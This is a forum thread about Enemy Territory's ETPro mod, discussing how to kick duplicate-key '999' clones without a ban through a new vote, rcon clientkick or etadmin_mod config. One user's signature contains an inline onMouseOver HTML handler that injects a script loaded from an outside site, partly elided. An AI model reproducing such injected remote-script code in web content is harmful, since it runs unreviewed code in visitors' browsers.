No ban kick?

Discussion for Bani's Tournament Mod

Moderators: Forum moderators, developers

Mat3k

No ban kick?

Post by Mat3k »

Em, just a suggestion, when people get 999 on clanwars for different reasons, they often get back and wait until they drop so that they can reconnet without getting kicked for duplicate key (and get a min ban). An easier solution is just kicking a player instead of waiting for him to drop, but in that case you also get banned for a couple of minutes.

I think it would be a nice idea to make a vote for no ban kicking, like callvote nobankick ETPlayer, his 999 clone gets kicked and the real player can connect immediately. This could save preciuos time, especially when both sides are pissed of and don't want to wait.
Rain

Post by Rain »

Or league configs could just turn off the silly key restrictions...
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
Deus

Post by Deus »

/rcon clientkick # [time]

for example:
/rcon clientkick 4 0
kicks the player with id 4 with 0 minutes ban
Mat3k

Post by Mat3k »

Yeah, i know that one, but you need rcon for that. Games are often played on borrowed servers or players don't have rcon for other reasons. I would like to see this easy and possible all the time as a simple vote, just like the regular kick.
Mark

Post by Mark »

Mat3k wrote:Yeah, i know that one, but you need rcon for that. Games are often played on borrowed servers or players don't have rcon for other reasons. I would like to see this easy and possible all the time as a simple vote, just like the regular kick.
Rcon or etadmin_mod ... :D

Ingame:
!kick <name>

in your config:
kick = clientkick "<PART2ID>" 0

etadmin_mod can do this for you. And you don't need to activate the killing sprees or first blood messages, when you run it on a war server. But you still need someone who has "admin" rights then.

Greets
Mark
Get owned at: Gaming@d1p.de (217.172.182.126:27960)
Hi! I'm a .signature *virus*! Copy me into your ~/.signature to help me spread!
Mat3k

Post by Mat3k »

Look, i know there's many ways to fix this, it can even be done without any modifications, just by changing the ban-time of the original kick command, but that's not the point. We can never convince ALL the admins to do this, most of them will just use default settings.

The only real solution is either putting this feature in etpro (cuz everyone uses it and they will have to update) or, as Rain said, switching off the key restrictions, they dont have a point really with et being free game.
Trippy

Post by Trippy »

yea would be a nice feature to include.